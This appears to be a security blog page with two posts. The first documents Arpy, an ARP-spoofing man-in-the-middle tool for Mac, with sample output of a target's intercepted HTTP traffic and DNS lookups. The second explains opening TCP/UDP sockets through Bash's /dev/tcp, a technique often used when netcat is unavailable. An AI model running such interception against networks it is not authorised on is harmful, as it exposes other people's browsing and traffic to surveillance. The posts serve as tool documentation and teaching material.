Arpy - Mac OSX Arp Spoof (MITM) Tool

Arpy is an easy-to-use ARP spoofing MiTM tool for Mac. It provides 3 targeted functions: 

• Packet Sniffing
• Visited Domains
• Visited Domains with Gource

Each function will be explained below. 

Tested OS (to date) 

• Darwin 14.3.0 Darwin Kernel Version 14.3.0 (Mac OS X)

Requirements 

• Python 2.7
• Gource
• Scapy

Installation 

Gource 

brew install gource

Scapy 

pip install scapy

Sample Commands 

ivanvza:~/ > sudo arpy
     _____
    |  _  |___ ___ _ _
    |     |  _| . | | |
    |__|__|_| |  _|_  |
    MiTM Tool |_| |___|
    v3.15 -@viljoenivan

Usage: arpy -t <Target IP> -g <Gateway IP> -i <Interface>

ARP MiTM Tool

Options:
  -h, --help            show this help message and exit
  -t TARGET, --target=TARGET
                        The Target IP
  -g GATEWAY, --gateway=GATEWAY
                        The Gateway
  -i INTERFACE, --interface=INTERFACE
                        Interface to use
  --tcp                 Filters out only tcp traffic
  --udp                 Filters out only udp traffic
  -d D_PORT, --destination_port=D_PORT
                        Filter for a destination port
  -s S_PORT, --source_port=S_PORT
                        Filter for a source port
  --sniff               Sniff all passing data
  --sniff-dns           Sniff only searched domains
  --sniff-dns-gource    Output target's DNS searches in gource format
  -v                    Verbose scapy packet print

Packet Sniff 
This is the packet sniffer, it allows you to see your target's traffic. 

ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff
     _____
    |  _  |___ ___ _ _
    |     |  _| . | | |
    |__|__|_| |  _|_  |
    MiTM Tool |_| |___|
    v3.15 -@viljoenivan


  [Info] Starting Sniffer...

[Info] Enabling IP Forwarding...
[Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3))

[Info] Found the following (IP layer): 192.168.1.3 -> 46.101.34.90
GET / HTTP/1.1
User-Agent: curl/7.37.1
Host: ivanvza.ninja
Accept: */*



[Info] Found the following (IP layer): 46.101.34.90 -> 192.168.1.3
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2719538271"
Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT
Content-Length: 3213
Date: Fri, 29 May 2015 20:15:06 GMT
Server: Microsoft IIS

<html>
     <title>><></title>
    <body>
        <pre style="line-height: 1.25; white-space: pre;">
        \          SORRY            /
         \                         /
          \    This page does     /
           ]   not exist yet.    [    ,'|
           ]                     [   /  |
           ]___               ___[ ,'   |
           ]  ]\             /[  [ |:   |
           ]  ] \           / [  [ |:   |
           ]  ]  ]         [  [  [ |:   |
           ]  ]  ]__     __[  [  [ |:   |
           ]  ]  ] ]\ _ /[ [  [  [ |:   |
           ]  ]  ] ] (#) [ [  [  [ :===='
           ]  ]  ]_].nHn.[_[  [  [
           ]  ]  ]  HHHHH. [  [  [
           ]  ] /   `HH("N  \ [  [
           ]__]/     HHH  "  \[__[
           ]         NNN         [
           ]         N/"         [
           ]         N H         [
          /          N            \
         /           q,            \
        /                           \
        </pre>
        <h3 id="list"><h3>
    </body>
<script>

// NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
var RTCPeerConnection = /*window.RTCPeerConnection ||

DNS Sniff 
This function allows you to see domain names that your target is currently requesting. 

ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns
     _____
    |  _  |___ ___ _ _
    |     |  _| . | | |
    |__|__|_| |  _|_  |
    MiTM Tool |_| |___|
         - @viljoenivan


  [Info] Starting DNS Sniffer...

[Info] Enabling IP Forwarding...
[Info] Done...
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: www.youtube.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s2.googleusercontent.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s.ytimg.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: fonts.gstatic.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: yt3.ggpht.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: i.ytimg.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing.google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.

DNS Sniff With Gource 
This function is more or less the same as the above, however it provides the functionality to pass it through Gource to get a live feed of what your target is viewing. 

ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource
[INFO] For a live gource feed run this command in parallel with this one:

tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 -

[Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3) and dst port 53)

Sample Gource footage 

DOWNLOAD LINK 

Read More

How To Open TCP/UDP Sockets

How to open TCP/UDP sockets using a built-in feature in Bash ?

Bash shell has a built-in feature that allows to open TCP/UDP sockets using a simple syntax. This is very useful when tools like netcat are not installed or we don’t have the permission to use it.

The syntax is

$ exec {file-descriptor}<>/dev/{protocol}/{host}/{port}

• {file-descriptor} – 0, 1 and 2 are seserved for stdin, stout and stderr respectively. At least 3 must be used. The Bash manual suggest to be careful in using descriptors above 9 since there could be conflict with descriptors used internally by the shell.
• <> – the file is open for both reading and writing
• {protocol} – TCP or UDP
• {host} – ip address or domain name of the host
• {port} – logic port

Sockets can be closed using

$ exec {file-descriptor}<>&-

To send a message through the socket

echo -e -n "$MSG_OUT" >&3

or

printf "$MSG_OUT" >&3

To read a message from the socket

read -r -u -n $MSG_IN <&3

Output can be printed recursively

while read LINE <&3
do
    echo $LINE >&1
done

Or read entirely in one variable

OUTPUT=$(dd bs=$BYTES count=1 <&3 2> /dev/null)

Example:

$ exec 3<>/dev/tcp/127.0.0.1/1234

We are opening a socket for reading and writing to the 1234 port in the loopback interface.

The /dev/tcp and /dev/udp files aren’t real devices but are keywords interpreted by the Bash shell. Being a “bashism” this solution is not portable even if seems that ksh and zsh shells have the same feature enabled.

In this example we fetch the Google main page:

$ exec 3<>/dev/tcp/www.google.com/80
$ echo -e "GET / HTTP/1.1\n\n" >&3
$ cat <&3

It’s good practice to always close file descriptors

$ exec 3<&-
$ exec 3>&-

Finally,  IRC server example:

#!/bin/bash

##########################################################
# Config

NICK="CyberPunk"
SERVER="irc.n0where.net"
PORT=6667
CHANNEL="#CyberPunk"

##########################################################
# Main

exec 3<>/dev/tcp/${SERVER}/${PORT}
echo "NICK ${NICK}" >&3
echo "USER ${NICK} 8 * : ${NICK}" >&3
echo "JOIN ${CHANNEL}" >&3
cat <&3

exit $?

Enable/disable net redirections

More the feature must be enabled in Bash at compile time. To enable it if you want to compile the Bash yourself include the flag

--enable-net-redirections

while to disable it explicitly use

--disable-net-redirections

Each distribution may or not have the feature enabled in their precompiled Bash.

This is a built-in feature that needs to be enabled in Bash at compile time but also ksh and zsh seem to have it. System administrators might want to disable this feature since could represent a security concern. In general the use of specific tools to create sockets like netcat and socat are preferable if possible.

Read More